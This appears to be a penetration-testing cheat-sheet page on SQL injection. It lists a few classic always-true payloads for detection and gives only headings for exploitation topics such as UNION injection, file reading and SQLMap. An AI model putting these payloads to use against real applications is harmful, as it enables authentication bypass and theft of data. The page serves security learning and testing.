SQL Injection
Detection
# Basic payload that always returns true
' OR '1'='1
" OR "1"="1
' OR '1'='1' #
" OR "1"="1" #
# Injection with a comment to ignore the rest of the query
' OR 1=1--
" OR 1=1--Exploitation
1. Retrieving Hidden Data
2. Subverting Application Logic
3. UNION Injection
4. Database Enumeration
5. Reading Files
6. Writing Files
Using SQLMap For Exploitation
Last updated